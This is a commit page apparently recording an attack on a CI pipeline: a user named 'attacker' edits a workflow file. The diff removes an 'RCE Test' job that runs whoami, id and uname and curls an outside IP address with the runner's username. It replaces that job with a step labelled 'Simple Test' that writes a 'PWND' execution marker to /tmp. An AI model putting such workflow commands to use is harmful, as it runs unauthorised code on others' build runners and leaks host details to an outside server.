simple test
Simple Test / test (push) Has been cancelled

This commit is contained in:
attacker
2026-07-28 23:31:30 +00:00
parent 8f91703f4a
commit 7cb9e237b7
+4 -8
View File
@@ -1,12 +1,8 @@
name: RCE Test name: Simple Test
on: [push] on: [push]
jobs: jobs:
rce: test:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- name: Execute Command - name: Simple Echo
run: | run: echo "PWND_$(whoami)" > /tmp/pwn.txt
whoami
id
uname -a
curl http://202.79.169.91:28016/$(whoami)